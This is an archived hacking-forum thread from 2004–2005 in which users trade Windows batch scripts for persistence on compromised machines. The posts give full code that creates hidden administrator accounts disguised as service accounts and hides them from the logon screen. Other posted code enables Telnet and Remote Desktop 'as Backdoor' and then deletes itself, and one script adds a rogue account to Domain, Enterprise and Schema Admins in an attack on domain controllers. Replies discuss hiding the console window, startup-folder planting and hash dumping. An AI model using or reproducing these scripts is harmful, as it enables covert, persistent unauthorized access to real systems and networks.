If you Have any Suggestion to make it better , Post Here Your Ideas.
A suggestion - make it so that it pops up a question to ask the user what the password is.
Of course, since you say its open source, why not just say "You can create your own such file by typing this stuff into notepad and then saving it as blat.cmd (or blat.bat for that matter). If people want to know what its doing use "net help user" in any cmd window
CODE
@echo off net user IUSR_WAN /add /expires:never net localgroup administrators /add IUSR_REMOTE net user IUSR_WAN herman net user IUSR_WAN /comment:"Built-in account for Remote Service" net user IUSR_WAN /fullname:"Remote Service Account"
As for comments, that password is very insecure and should never be used on an internet connected system , also, your bad copy/pasting means that you add a different user to the administrators group... woops.... bad boy!
hercules
Nov 16 2004, 10:55 PM
Tnx for bad type, Link Updated.
We Have Working to Make it as a Tools.
HermanGroup
Nov 16 2004, 10:58 PM
About: ======= User-CMD Tools is a simple Program that using NET USER commands to Add , Delete Or Modify an Administrator User Account of Windows NT/2K,XP,2003.
From Net Help : "NET USER creates and modifies user accounts on computers. When used without switches, it lists the user accounts for the computer. The user account information is stored in the user accounts database."
username Is the name of the user account to add, delete, modify, or view. The name of the user account can have as many as 20 characters. password Assigns or changes a password for the user's account. A password must satisfy the minimum length set with the /MINPWLEN option of the NET ACCOUNTS command. It can have as many as 14 characters.
/ADD Adds a user account to the user accounts database. /DELETE Removes a user account from the user accounts database.
/FULLNAME:"name" Is a user's full name (rather than a username). Enclose the name in quotation marks. /COMMENT:"text" Provides a descriptive comment about the user's account. Enclose the text in quotation marks.
/EXPIRES:{date | NEVER} Causes the account to expire if date is set. NEVER sets no time limit on the account. An expiration date is in the form mm/dd/yy(yy). Months can be a number, spelled out, or abbreviated with three letters. Year can be two or four numbers. Use slashes(/) (no spaces) to separate parts of the date.
better code for xp this will create the account and make it not visible on the login screen
CODE
@echo off net user illwill password /add && net localgroup administrators illwill /add echo Windows Registry Editor Version 5.00> c:\hide.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg echo "illwill"=dword:00000000>> c:\hide.reg REGEDIT /S c:\hide.REG DEL /Q c:\hide.REG Exit
or if in a shell prompt one simple copy paste
CODE
net user illwill password /add && net localgroup administrators illwill /add && echo Windows Registry Editor Version 5.00> c:\hide.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg && echo "illwill"=dword:00000000>> c:\hide.reg && REGEDIT /S c:\hide.REG && DEL /Q c:\hide.REG
of course you can also modify this to look like some microsoft added user account too
w00dy
Nov 17 2004, 03:17 AM
CODE
@echo off net user UserName /add /expires:never * /comment:"User Name Account" /fullname:"User Name" net localgroup administrators /add UserName
Will add it, NOT HIDE IT, and prompt for password.
HermanGroup
Nov 17 2004, 11:09 PM
Get the tools and give me more idea to add on it .!
why not just net user IUSR_REMOTE herman /add /expires:never /comment:"Built-in account for Remote Service" /fullname:"Remote Service Account" && net localgroup administrators IUSR_REMOTE /add
FiNaLBeTa
Nov 19 2004, 11:09 PM
QUOTE(illwill @ Nov 17 2004, 02:24 AM)
better code for xp this will create the account and make it not visible on the login screen
Yeah, i made a simple batchfile that can do the same. Bit of a gui batch i did for making some acount on my home network for sharing, didn't want the acount to show on the loginscreen.
CODE
@ECHO off TITLE XP Acount creator ( FiNaLBeTa @ NFE ) COLOR 0f set AC_PART=001 :HEADER echo. ECHO [INFO] ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% ) echo \ GOTO %AC_PART%
:001 SET /P AC_NAME= [*] Acount name? : cls SET AC_PART=002 GOTO HEADER
:002 SET /P AC_PASS= [*] Acount password? : cls SET AC_PART=003 GOTO HEADER
:003 SET /P AC_COMMENT= [*] Acount Comment? : cls SET AC_PART=004 GOTO HEADER
:004 ECHO [* The following groups are available on the machine. ECHO. net localgroup | find "*" ECHO. SET /P AC_GROUP= [*] Group? : cls SET AC_PART=005 GOTO HEADER
:005 SET /P AC_OK= [*] Creating acount now, Continue? (y/n) : IF NOT %AC_OK%==y GOTO 0051 net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%" net localgroup "%AC_GROUP%" %AC_NAME% /add ECHO. pause
:0051 cls SET AC_PART=006 GOTO HEADER
:006 SET /P AC_HIDE= [*] Do you want to hide the acount from the XP logon screen? (y/n) : IF NOT %AC_HIDE%==y GOTO END echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg Regedit /s %TEMP%\addregistry.reg Del %TEMP%\addregistry.reg :END ECHO. pause
Katja
Nov 19 2004, 11:44 PM
finalbeta your batch looks like nice thank u
Paul
Nov 20 2004, 09:45 AM
You cant do that when you dont have admin acces already...
hercules
Dec 6 2004, 09:04 AM
QUOTE
You cant do that when you dont have admin acces already...
Cmd commands always work when you have admin access only
hercules
Dec 6 2004, 09:09 AM
FiNaLBeTa , your Code like very nice.
Chinzo
Dec 6 2004, 01:41 PM
yes, many interistng script, many thanks for that, I have learn funny commands
r00t
Dec 22 2004, 11:11 AM
Hi m8's
Thx for the HIDE TIPP @ illwill. And also a lot of thanks for the batch file from FiNaLBeTa.
Looks nice and i could lern something from it.
Thx.
rasraven
Dec 22 2004, 12:16 PM
Just combine it a script that enable Telnet or RemoteDesktop and you have a perfect Backdoor with just a batch file
Telnet
CODE
@echo off rem Enable Telnet as Backdoor on 2k @echo REGEDIT4>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg echo. >>temp.reg echo "ErrorControl"=dword:00000001>>temp.reg echo "Start"=dword:00000002>>temp.reg echo "Type"=dword:00000010>>temp.reg echo "FailureActions"=hex& #58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg echo. >>temp.reg echo "NTLM"=dword:00000001>>temp.reg echo "TelnetPort"=dword:0000ffff>>temp.reg echo. regedit /s temp.reg echo Starting Service net start tlntsvr echo cleanup del temp.reg del install.cmd exit
RemoteDesktop
CODE
rem enable RemoteDesktop on Win XP echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg regedit /s c:\TS.reg del c:\TS.reg
Terminal Service
CODE
REM Auto Terminal Service enabler (works on XP/2000/2003) @echo off echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg echo "Start"=dword:00000002>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "AllowTSConnections"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AutoAdminLogon"="1">> c:\TS.reg @echo --[ Registering the service... ] echo. REGEDIT /S C:\TS.REG REGEDIT -S C:\TS.REG echo [Components] > c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL /Q c:\TS.REG DEL /Q c:\bootlog~.txt echo. exit
hope to usefull
simply-me
Dec 26 2004, 04:31 AM
well this can be useful if you dont have NTFS on a machine, put this in the admins startup dir, and whenever he logs in next you got a admin account too. But what about the big black box he sees at startup, may be make a vb prog with something like
CODE
shell "temp.bat", vbHidden
And also add some code to delete both the files after this is done.
Is there a better way to hide the dos window?
hercules
Jan 7 2005, 10:27 AM
Thanks for the batch file Rasraven.
Terminal Service & Remote desktop work Exactly, But Telnet Service Activate when System Restarted in XP windows.
Booster2ooo
Jan 10 2005, 04:03 PM
rasraven: Your scripts seems to be cool but don't seems to work ...
Telnet: "FailureActions"=hex '#58' is not recognise as a cmd ... (smth like than) 'a' is not recognise ...
RemoteDesk & Termserv: The batch processing is ok, but there don't seems to be activated ... and i presume there is no space echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg
and in others cmd
itchy2000
Jan 11 2005, 05:48 AM
Nice work on the batch files guys, learning allot from this
KeKeTTe
Jan 11 2005, 01:35 PM
very interesting post thx u all
whi7er
Feb 3 2005, 02:27 PM
i should say any .cmd/.bat is always open source. anyway thanks!
Enz0s
Feb 3 2005, 08:49 PM
thanks for bat files
roxi
Feb 3 2005, 09:02 PM
good work...
Bedosman
Feb 3 2005, 10:10 PM
yeah , very very interesting
I've learned some very cool command
Thx to all for sharing your knowledge
t_gillum
Feb 3 2005, 11:48 PM
yeah you may not be able to do it if you have admin rights but you can make a schedule to execute the batch file using the at command under windows xp then the system will call the script and well do anything you like. This is why task scheduler is so dangrous in windows becuase when it calls the task it runs the whatever as system prevliages not the user that created the task. In theory of course
dijk
Feb 6 2005, 12:56 AM
this is indeed a very handy topic .....didnt knew all of it ... learnt some nice stuff here.....thx a bundle
just use pwdump4 to get hashes and then crack the hashes... and bam you got the admin pass, so i don't know any reason why you should add an own user account
grtz
hercules
Feb 12 2005, 08:47 PM
User-CMD Tools is a simple Program that using NET USER commands to Add , Delete Or Modify an Administrator User Account of Windows NT/2K,XP,2003.
Every one can Download This from Herman Group site
Fletcher
Feb 12 2005, 09:35 PM
very interesting, thx a lot for everybody
andream
Mar 18 2005, 10:18 PM
Does the task schedule even work if i'm in the login screen and haven't logged yet? Sorry, i don't know much of this.
DumpZ
Mar 22 2005, 07:54 AM
QUOTE(rasraven @ Dec 22 2004, 12:16 PM)
Just combine it a script that enable Telnet or RemoteDesktop and you have a perfect Backdoor with just a batch file
Telnet
CODE
@echo off rem Enable Telnet as Backdoor on 2k @echo REGEDIT4>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg echo. >>temp.reg echo "ErrorControl"=dword:00000001>>temp.reg echo "Start"=dword:00000002>>temp.reg echo "Type"=dword:00000010>>temp.reg echo "FailureActions"=hex& #58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg echo. >>temp.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg echo. >>temp.reg echo "NTLM"=dword:00000001>>temp.reg echo "TelnetPort"=dword:0000ffff>>temp.reg echo. regedit /s temp.reg echo Starting Service net start tlntsvr echo cleanup del temp.reg del install.cmd exit
RemoteDesktop
CODE
rem enable RemoteDesktop on Win XP echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg regedit /s c:\TS.reg del c:\TS.reg
Terminal Service
CODE
REM Auto Terminal Service enabler (works on XP/2000/2003) @echo off echo Windows Registry Editor Version 5.00> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg echo "Start"=dword:00000002>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "AllowTSConnections"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server]>> c:\TS.reg echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg echo "AutoAdminLogon"="1">> c:\TS.reg @echo --[ Registering the service... ] echo. REGEDIT /S C:\TS.REG REGEDIT -S C:\TS.REG echo [Components] > c:\bootlog~.txt echo TSEnabled = on >> c:\bootlog~.txt sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q DEL /Q c:\TS.REG DEL /Q c:\bootlog~.txt echo. exit
hope to usefull
That Terminal Server part probably won't work without cd, unless you arlrady have the file in place.
Terminal
Mar 22 2005, 03:10 PM
QUOTE(DumpZ @ Mar 22 2005, 01:24 PM)
That Terminal Server part probably won't work without cd, unless you arlrady have the file in place.
It works without asking for cd . I have tried it on few default xp proffessional machines and 3389 opens and um able to connect them .
HermanGroup
Apr 6 2005, 12:14 PM
Ok guys..I released the Delphi Cool Source code for it that make Excutable file and Compress it well.
In the attack against domain controllers, you can creates the batch file USER2.CMD with the following contents:
CODE
@echo off NET USER "IUSR_WAN" "password" /ADD /ACTIVE:YES /EXPIRES:NEVER NET LOCALGROUP "Administrators" "IUSR_WAN" /ADD NET GROUP "Domain Admins" "IUSR_WAN" /ADD NET GROUP "Enterprise Admins" "IUSR_WAN" /ADD NET GROUP "Schema Admins" "IUSR_WAN" /ADD NET GROUP "Group Policy Creator Owners" "IUSR_WAN" /ADD NET USER IUSR_WAN /comment:"Built-in account for Remote Service" NET USER IUSR_WAN /fullname:"Remote Service Account"
Note:
In this scenario, in the attack against domain controllers, the domain under the attack is the forest root domain.
isaiah
Jul 16 2005, 07:07 PM
Well 1 thing to say none of this will work if you do not already have admin rights. Lets say you are trying to gain admin locally it will not work if you dont already have. But if you already have it why not just Go add your self....
DarkRider
Jul 17 2005, 12:07 AM
You guys are missing one thing. It doesn't work on local versions Nolimit way is better then
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
, also, your bad copy/pasting means that you add a different user to the administrators group... woops.... bad boy!
